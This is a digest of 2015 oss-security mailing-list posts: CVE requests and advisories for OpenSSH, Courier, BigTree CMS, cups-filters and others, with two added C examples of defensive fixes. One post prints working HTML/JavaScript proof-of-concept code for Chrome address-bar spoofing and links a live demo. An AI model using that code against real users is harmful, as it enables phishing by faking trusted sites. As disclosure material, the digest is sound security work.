Andreas Stieger | 1 Jul 14:27 2015

CVE Request: two security issues in openSSH 6.9

Hi,

The openSSH 6.9 release contains the following changes declared as
security issues:

http://www.openssh.com/txt/release-6.9

> Security
> --------
>
>  * ssh(1): when forwarding X11 connections with ForwardX11Trusted=no,
>    connections made after ForwardX11Timeout expired could be permitted
>    and no longer subject to XSECURITY restrictions because of an
>    ineffective timeout check in ssh(1) coupled with "fail open"
>    behaviour in the X11 server when clients attempted connections with
>    expired credentials. This problem was reported by Jann Horn.

In the portable releases, this is 
https://anongit.mindrot.org/openssh.git/commit/?h=V_6_9&id=1bf477d3cdf1a864646d59820878783d42357a1d

>  * ssh-agent(1): fix weakness of agent locking (ssh-add -x) to
>    password guessing by implementing an increasing failure delay,
>    storing a salted hash of the password rather than the password
>    itself and using a timing-safe comparison function for verifying
>    unlock attempts. This problem was reported by Ryan Castellucci.

In the portable releases, this is
https://anongit.mindrot.org/openssh.git/commit/?h=V_6_9&id=9173d0fbe44de7ebcad8a15618e13a8b8d78902e

Could CVE-IDs be assigned for these please?
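The three measures the ssh-agent(1) item above lists (a salted hash instead of the stored password, a timing-safe comparison, and an increasing failure delay) as an added C example. This is not OpenSSH's code: the KDF is a small placeholder so the file compiles without libcrypto (a real agent uses bcrypt_pbkdf or another slow salted KDF), the doubling back-off with a 64-second cap is this example's own schedule, and the salt is passed in by the caller so the run is deterministic where a real agent would draw it from arc4random_buf.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LOCK_SALT_LEN 16
#define LOCK_HASH_LEN 32
#define LOCK_MAX_DELAY 64   /* assumed cap (seconds) on the failure back-off */

struct agent_lock {
    int locked;
    unsigned char salt[LOCK_SALT_LEN];
    unsigned char hash[LOCK_HASH_LEN];  /* KDF(salt, password); the password itself is never kept */
    unsigned fail_delay;                /* seconds to stall after the next failed unlock */
};

/* Constant-time equality test in the style of OpenBSD's timingsafe_bcmp():
 * all n bytes are visited whatever the position of the first mismatch, so
 * response time does not reveal how long the matching prefix was.
 * Returns 0 when equal, 1 otherwise. */
int timingsafe_bcmp_ex(const void *b1, const void *b2, size_t n)
{
    const unsigned char *p1 = b1, *p2 = b2;
    unsigned char acc = 0;
    while (n-- > 0)
        acc |= *p1++ ^ *p2++;
    return acc != 0;
}

/* PLACEHOLDER key derivation: iterated FNV-1a over salt || password,
 * expanded to LOCK_HASH_LEN bytes.  Dependency-free but NOT a password
 * hash; a real agent puts bcrypt_pbkdf(3) (OpenSSH's choice) here. */
void placeholder_kdf(const char *pw, size_t pwlen,
                     const unsigned char salt[LOCK_SALT_LEN],
                     unsigned char out[LOCK_HASH_LEN])
{
    uint64_t h = 0xcbf29ce484222325ULL;
    for (int r = 0; r < 4096; r++) {
        for (size_t i = 0; i < LOCK_SALT_LEN; i++)
            h = (h ^ salt[i]) * 0x100000001b3ULL;
        for (size_t i = 0; i < pwlen; i++)
            h = (h ^ (unsigned char)pw[i]) * 0x100000001b3ULL;
        h ^= h >> 32;
    }
    for (size_t i = 0; i < LOCK_HASH_LEN; i++) {
        h = (h ^ (unsigned char)i) * 0x100000001b3ULL;
        out[i] = (unsigned char)(h >> 56);
    }
}

/* Lock the agent: store salt and hash, never the password. */
int agent_lock(struct agent_lock *l, const char *pw,
               const unsigned char salt[LOCK_SALT_LEN])
{
    if (l->locked)
        return -1;
    memcpy(l->salt, salt, LOCK_SALT_LEN);
    placeholder_kdf(pw, strlen(pw), l->salt, l->hash);
    l->fail_delay = 1;
    l->locked = 1;
    return 0;
}

/* Try to unlock.  Returns 0 on success.  On a wrong password returns the
 * number of seconds the agent should stall before replying; the stall
 * doubles on each consecutive failure up to LOCK_MAX_DELAY. */
unsigned agent_unlock(struct agent_lock *l, const char *pw)
{
    unsigned char cand[LOCK_HASH_LEN];
    unsigned delay;

    if (!l->locked)
        return 0;
    placeholder_kdf(pw, strlen(pw), l->salt, cand);
    if (timingsafe_bcmp_ex(cand, l->hash, LOCK_HASH_LEN) == 0) {
        memset(l->hash, 0, sizeof l->hash);  /* OpenSSH would use explicit_bzero */
        l->fail_delay = 1;
        l->locked = 0;
        return 0;
    }
    delay = l->fail_delay;
    if (l->fail_delay < LOCK_MAX_DELAY)
        l->fail_delay *= 2;
    return delay;
}

/* Lock, three bad guesses, then the right password.  Returns 0 when every
 * check holds, otherwise the number of the first failing check. */
int agent_lock_selftest(void)
{
    struct agent_lock l;
    unsigned char salt[LOCK_SALT_LEN], salt2[LOCK_SALT_LEN], h2[LOCK_HASH_LEN];

    memset(&l, 0, sizeof l);
    memset(salt, 0x5a, sizeof salt);
    memset(salt2, 0xa5, sizeof salt2);
    if (agent_lock(&l, "hunter2", salt) != 0)    return 1;
    if (memcmp(l.hash, "hunter2", 7) == 0)       return 2;  /* plaintext not stored */
    placeholder_kdf("hunter2", 7, salt2, h2);
    if (memcmp(h2, l.hash, LOCK_HASH_LEN) == 0)  return 3;  /* salt changes the hash */
    if (agent_unlock(&l, "hunter3") != 1)        return 4;
    if (agent_unlock(&l, "hunter3") != 2)        return 5;
    if (agent_unlock(&l, "hunter3") != 4)        return 6;
    if (agent_unlock(&l, "hunter2") != 0)        return 7;
    if (l.locked)                                return 8;
    return 0;
}

int main(void)
{
    printf("selftest: %d (0 = all checks passed)\n", agent_lock_selftest());
    return 0;
}
```

The delay is returned rather than slept so the schedule can be checked; in an agent the caller would sleep for that many seconds before sending the failure reply, which is what turns a per-attempt guessing cost into something an attacker holding the socket cannot parallelise away.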


CVE request: persistent XSS in Wordpress Plugin NewStatPress v.1.0.3

OpenWallInfo
============
Created Tuesday 30 June 2015

Dear Sir or Madam,

we want to inform you about a security vulnerability in one of the
plugins provided by you or one member of your company.
Please regard the information below.

Plugin:
NewStatPress (https://wordpress.org/plugins/newstatpress/)

Product-Type:
Wordpress-Plugin

Version:
1.0.3

Vendor:         
ice00 (http://newstatpress.altervista.org/?page_id=2)

Fixed:             
reported: 2015-06-30
fixed in version 1.04, 2015-06-30

Changelog:         
https://wordpress.org/plugins/newstatpress/changelog/

Type of vulnerability:

Garth Mollett | 1 Jul 00:24 2015

Reject CVE-2015-3157

Please reject CVE-2015-3157. This was a private assignment to openstack
-trove due to a misunderstanding of the scope of a password exposure.

Thanks. 

-- 
Garth Mollett / Red Hat Product Security

Salvatore Bonaccorso | 30 Jun 20:50 2015

CVE Request: UDP checksum DoS

Hi

AFAICS there wasn't a CVE requested for the following:

https://twitter.com/grsecurity/status/605854034260426753

> remote DoS via flood of UDP packets with invalid checksums

It has been fixed in v4.1-rc7:

https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=beb39db59d14990e401e235faf66a6b9b31240b0

Could you assign a CVE for this issue?

Thanks in advance,

Regards,
Salvatore

David Leo | 30 Jun 08:08 2015

Google Chrome Address Spoofing (Request For Comment)

Impact:
The "click to verify" thing is completely broken...
Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)

Note:
No user interaction on the fake page.

Code:
***** index.html
<script>
// Keep replacing the popup's location with a fresh oracle.com URL; the
// changing query string makes each call a new navigation, and every
// call schedules two more, so the navigation attempts multiply.
function next()
{
	w.location.replace('http://www.oracle.com/index.html?'+n);n++;
	setTimeout("next();",15);
	setTimeout("next();",25);
}
// Open content.html in a new window, then poll until reading its
// location throws (it has navigated cross-origin to oracle.com) and
// start the replace() loop.
function f()
{
	w=window.open("content.html","_blank","width=500 height=500");
	i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
}
</script>
<a href="#" onclick="f()">Go</a><br>
***** content.html
<b>This web page is NOT oracle.com</b>
<script>location="http://www.oracle.com/index.html";</script>
***** It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says "June/16/2015" - it works as we tested today)

Kurt Seifried | 30 Jun 07:11 2015

Question about world readable config files and commented warnings

So, if a config file is world readable by default, but the section where
you might put a password says:

########
# Database URI for the database that stores the package information. If it
# contains a password, make sure to adjust the permissions of the config
########

Is that good enough, e.g. no CVE, or do we actually need to have proper
permissions?

I'm thinking we need proper permissions and not a note (especially with
administration tools/etc that may parse/modify the file but not change
the perms). Thoughts/comments/final decision from Mitre is welcome.

-- 
Kurt Seifried -- Red Hat -- Product Security -- Cloud
PGP A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Red Hat Product Security contact: secalert@...

David Jorm | 30 Jun 01:04 2015

OpenDaylight security advisory: CVE-2015-3414 CVE-2015-3416 SQLite memory corruption, CVE-2015-4000 LOGJAM TLS MITM

Hi All

OpenDaylight Lithium GA has now been released, including patches for
several security vulnerabilities:

[Moderate] CVE-2015-3414 CVE-2015-3416 AAA: SQLite memory corruption
leading to DoS and possible code execution

[Moderate] CVE-2015-4000 OpenDaylight: TLS connections which support export
grade DHE key-exchange are vulnerable to MITM attacks (LOGJAM)

Full details, including links to patched builds, are available on the
OpenDaylight security advisories page:

https://wiki.opendaylight.org/view/Security_Advisories

Thanks
David Jorm on behalf of the OpenDaylight security response team

Hanno Böck | 29 Jun 11:24 2015

Courier mail server: Write heap overflow in mailbot tool and out of bounds heap read in imap folder parser

https://blog.fuzzing-project.org/17-Courier-mail-server-Write-heap-overflow-in-mailbot-tool-and-out-of-bounds-heap-read-in-imap-folder-parser.html

Two memory access issues were found in the Courier mail server. These
issues were discovered by compiling the software with Address Sanitizer
(-fsanitize=address) and running the test suite.

In the file mailboxlist.c, part of the IMAP folder parser, there is a
memcmp call checking whether the first six bytes of a string match
"SHARED". However the string can be less than six bytes, which will
cause an out of bounds read access. This issue is unlikely to cause
much trouble.

In the mailbot tool (mailbot.c) there is a memory allocation for a
zero-terminated list of pointers. The allocation only reserves one byte
for the zero termination, however it must be the size of the pointer (8
bytes on 64 bit systems). Therefore it causes a write heap overflow of
seven zero bytes. The code parses command line data, therefore it is
unlikely that any attacker controlled input is affected.

Both issues have been reported to Courier's developer Sam Varshavchik
on 27th June 2015 and were fixed with the release of courier 0.75 on
29th June 2015.

Commit / Patch (bundles some unrelated changes, the relevant parts are
in mailbot.c and mailboxlist.c)
https://github.com/svarshavchik/courier-libs/commit/174541a2e670c0ee70fd2fb3116209f96ecc173e

Courier 0.75 release announcement
http://sourceforge.net/p/courier/mailman/message/34249147/

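The two bug patterns Hanno describes, each beside a form that avoids it, as an added C example. This is not Courier's code: the function names, the comma-separated input format and the sample mailbox names are constructed for the example, and the sizing helpers only reproduce the arithmetic of "one byte for the terminator" versus "one pointer for the terminator".

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Pattern 1: memcmp() always reads 6 bytes, so a name shorter than
 * "SHARED" is read past its NUL terminator (the mailboxlist.c bug
 * class).  Kept only for comparison; never call it with a name shorter
 * than six bytes. */
int is_shared_unsafe(const char *name)
{
    return memcmp(name, "SHARED", 6) == 0;
}

/* Safe form: strncmp() stops at the first NUL in either operand, so a
 * short name compares unequal instead of being over-read. */
int is_shared_safe(const char *name)
{
    return strncmp(name, "SHARED", 6) == 0;
}

/* Pattern 2: a NULL-terminated pointer list needs one extra *pointer*,
 * not one extra byte.  The buggy size is short by sizeof(char *) - 1
 * bytes (7 on 64-bit), which is exactly what writing the terminator
 * overflows by. */
size_t ptrlist_bytes_buggy(size_t n) { return n * sizeof(char *) + 1; }
size_t ptrlist_bytes_fixed(size_t n) { return (n + 1) * sizeof(char *); }

/* Split a comma-separated string into a NULL-terminated pointer array
 * sized correctly.  Returns NULL on allocation failure or size overflow.
 * Release with free_list(). */
char **split_list(const char *s, size_t *count)
{
    size_t n = 1, len = strlen(s), i = 0;
    const char *q;
    char **list, *copy, *tok, *p;

    for (q = s; *q; q++)
        if (*q == ',')
            n++;
    if (n > SIZE_MAX / sizeof *list - 1)
        return NULL;                          /* (n + 1) * sizeof would wrap */
    list = calloc(n + 1, sizeof *list);       /* n entries + terminating NULL */
    if (list == NULL)
        return NULL;
    copy = malloc(len + 1);
    if (copy == NULL) {
        free(list);
        return NULL;
    }
    memcpy(copy, s, len + 1);

    for (tok = p = copy; ; p++) {
        if (*p == ',' || *p == '\0') {
            int last = (*p == '\0');
            *p = '\0';
            list[i++] = tok;
            if (last)
                break;
            tok = p + 1;
        }
    }
    list[i] = NULL;                           /* i == n, and slot n exists */
    *count = i;
    return list;
}

void free_list(char **list)
{
    if (list != NULL) {
        free(list[0]);   /* list[0] is the start of the single backing copy */
        free(list);
    }
}

/* Number of fields, or (size_t)-1 on allocation failure and (size_t)-2
 * if the terminator is missing; wrapped so the result is checkable. */
size_t split_count(const char *s)
{
    size_t n;
    char **list = split_list(s, &n);
    if (list == NULL)
        return (size_t)-1;
    if (list[n] != NULL)
        n = (size_t)-2;
    free_list(list);
    return n;
}

int main(void)
{
    size_t n;
    char **list = split_list("INBOX,SHARED.users,SHAR", &n);   /* constructed input */
    for (size_t i = 0; list != NULL && list[i] != NULL; i++)
        printf("%s -> %s\n", list[i], is_shared_safe(list[i]) ? "shared" : "private");
    free_list(list);
    return 0;
}
```

Building with -fsanitize=address, as the advisory did, is the practical check for both patterns: the over-read in the unsafe comparison and the short allocation show up as reports on the first run rather than as silent corruption.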

Matthew Wilkes | 28 Jun 01:23 2015

CVE Request: Django CMS

Hi,

Can a CVE be assigned to this issue, please?

     http://www.django-cms.org/en/blog/2015/06/27/311-3014-release/

It's a CSRF issue around publishing of draft changes in Django CMS. 
Versions affected are Django CMS <3.0.14 and <3.1.1. I haven't verified 
its presence in Django CMS <3.0, I'm afraid.

The relevant commit is:

https://github.com/divio/django-cms/commit/f77cbc607d6e2a62e63287d37ad320109a2cc78a

The vendor credits with the discovery:
  * Sylvain Fankhauser of L//P
  * Matthew Wilkes of The Code Distillery

Thanks, let me know if you'd like more information.

Matt

Anirudh Anand | 26 Jun 19:00 2015

CVE Request - BigTree CMS - Stored XSS while creating a new user

Hello all,

BigTree CMS is a popular Content Management System written in PHP. While
creating a new user, the "*Name*" and "*Company*" parameters are not
properly sanitized and it leads to stored XSS.

*Date:* 25th June, 2015

*Exploit Author:* Anirudh Anand

*Vendor Homepage*: https://www.bigtreecms.org/

*Software Link:* https://www.bigtreecms.org/download/

*Version: *< 4.2.2

*Tested on:* Linux:- Ubuntu, Debian

The issue has been successfully reported to vendor and they have released
an update for the same.

*References: *

*Bug Report:* https://github.com/bigtreecms/BigTree-CMS/issues/205

*Fix Released:*
https://github.com/bigtreecms/BigTree-CMS/commit/e13aa4795cdeb1ab1dc0f5fd0b66df2d1296591d


Stefan Cornelius | 26 Jun 18:43 2015

CVE-2015-3258 cups-filters: texttopdf heap-based buffer overflow

Hi,

A heap-based buffer overflow was discovered in the way the texttopdf
utility of cups-filters processed print jobs with a specially crafted
line size. An attacker being able to submit print jobs could exploit
this flaw to crash texttopdf or, possibly, execute arbitrary code.

This was discovered by Petr Sklenar of Red Hat.

This is fixed in cups-filters 1.0.70.

Patch:
http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7363

Minor note on the side: The commit thanks me for the patch. The patch
was created by Tim Waugh of Red Hat, I've merely forwarded it.

Red Hat bug:
https://bugzilla.redhat.com/show_bug.cgi?id=1235385

Thanks,
-- 
Stefan Cornelius / Red Hat Product Security

